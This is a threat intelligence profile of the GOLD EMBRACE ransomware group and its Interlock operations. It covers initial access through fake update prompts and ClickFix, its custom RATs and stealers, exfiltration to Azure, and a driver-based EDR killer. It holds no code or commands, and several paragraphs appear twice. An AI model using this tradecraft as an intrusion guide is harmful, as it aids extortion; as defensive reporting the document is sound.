.svg?width=185&quality=80&auto=webp&format=auto&cache=true&immutable=true&cache-control=max-age%3D31536000 "Home"){kind=logo}
.svg?width=13&quality=80&auto=webp&format=auto&cache=true&immutable=true&cache-control=max-age%3D31536000 "Top Navigation - Sign in - Icon")
Summary
GOLD EMBRACE is a financially motivated cybercriminal threat group operating the Interlock double extortion ransomware, first observed in late September 2024. The group targets organizations across North America and Europe, with victims from a range of sectors including healthcare, government, education, and manufacturing. Victims who decline to pay are named on the group's dedicated leak site, which they have named the "Worldwide Secrets Blog”. Ransom notes do not include a demand or payment instructions; instead, victims receive a unique code and are directed to a Tor-hosted negotiation portal. Some third-party researchers have noted technical overlaps with the Rhysida ransomware family (operated by GOLD VICTOR), including similarities in ransom note structure and encryption logic, though no definitive relationship has been established.
The group gains initial access primarily through drive-by downloads served via compromised legitimate websites, which present visitors with fake browser update prompts or application error messages impersonating Google Chrome, Microsoft Teams, Fortinet FortiClient VPN, and Cisco AnyConnect. From early 2025, GOLD EMBRACE added the ClickFix and FileFix social engineering techniques, tricking users into pasting malicious PowerShell commands via fake CAPTCHA challenges into the Windows Run Command dialog or File Explorer address bar. Sophos researchers have observed the group exploiting CVE-2026-20131, an at-the-time zero-day vulnerability in Cisco Secure Firewall Management Center (FMC) Software. The group also acquires credentials from initial access brokers. GOLD EMBRACE have been observed using MintLoader to deliver post-exploitation implants following initial compromise.
After establishing a foothold, operators deploy the group's proprietary InterlockRAT and NodeSnakeRAT for command-and-control (C2), both of which route traffic through Cloudflare TryCloudflare tunnels to evade network-based detection. NodeSnake is written in Node.js, with a PHP variant appearing in July 2025, and features a modular design enabling customization of persistence, data collection, and lateral movement capabilities for each victim. Cobalt Strike and SystemBC provide additional C2 and proxy capability. Credentials are harvested using a custom stealer (cht.exe) and keylogger (klg.dll), alongside commodity stealers including Lumma Stealer and Berserk Stealer. Lateral movement is conducted via RDP, AnyDesk, PuTTY, and ScreenConnect. Prior to encryption, bulk data is exfiltrated to Azure storage blobs using AzCopy and Azure Storage Explorer, with WinSCP used in some intrusions.
All custom malware is protected by a proprietary packer, and the group deploys Hotta Killer, a custom EDR-termination tool exploiting a zero-day in the gaming driver GameDriverx64.sys (CVE-2025-61155) via a Bring Your Own Vulnerable Driver attack, immediately before encryption. The Interlock encryptor targets both Windows and Linux environments, including Nutanix AHV hypervisors and VMware ESXi, appending .interlock or .!nt3rlock extensions to encrypted files.
The group gains initial access primarily through drive-by downloads served via compromised legitimate websites, which present visitors with fake browser update prompts or application error messages impersonating Google Chrome, Microsoft Teams, Fortinet FortiClient VPN, and Cisco AnyConnect. From early 2025, GOLD EMBRACE added the ClickFix and FileFix social engineering techniques, tricking users into pasting malicious PowerShell commands via fake CAPTCHA challenges into the Windows Run Command dialog or File Explorer address bar. Sophos researchers have observed the group exploiting CVE-2026-20131, an at-the-time zero-day vulnerability in Cisco Secure Firewall Management Center (FMC) Software. The group also acquires credentials from initial access brokers. GOLD EMBRACE have been observed using MintLoader to deliver post-exploitation implants following initial compromise.
After establishing a foothold, operators deploy the group's proprietary InterlockRAT and NodeSnakeRAT for command-and-control (C2), both of which route traffic through Cloudflare TryCloudflare tunnels to evade network-based detection. NodeSnake is written in Node.js, with a PHP variant appearing in July 2025, and features a modular design enabling customization of persistence, data collection, and lateral movement capabilities for each victim. Cobalt Strike and SystemBC provide additional C2 and proxy capability. Credentials are harvested using a custom stealer (cht.exe) and keylogger (klg.dll), alongside commodity stealers including Lumma Stealer and Berserk Stealer. Lateral movement is conducted via RDP, AnyDesk, PuTTY, and ScreenConnect. Prior to encryption, bulk data is exfiltrated to Azure storage blobs using AzCopy and Azure Storage Explorer, with WinSCP used in some intrusions.
All custom malware is protected by a proprietary packer, and the group deploys Hotta Killer, a custom EDR-termination tool exploiting a zero-day in the gaming driver GameDriverx64.sys (CVE-2025-61155) via a Bring Your Own Vulnerable Driver attack, immediately before encryption. The Interlock encryptor targets both Windows and Linux environments, including Nutanix AHV hypervisors and VMware ESXi, appending .interlock or .!nt3rlock extensions to encrypted files.
Contact us
Contact us directly whether your organization needs immediate assistance or
you want to discuss your incident readiness, response, and testing needs.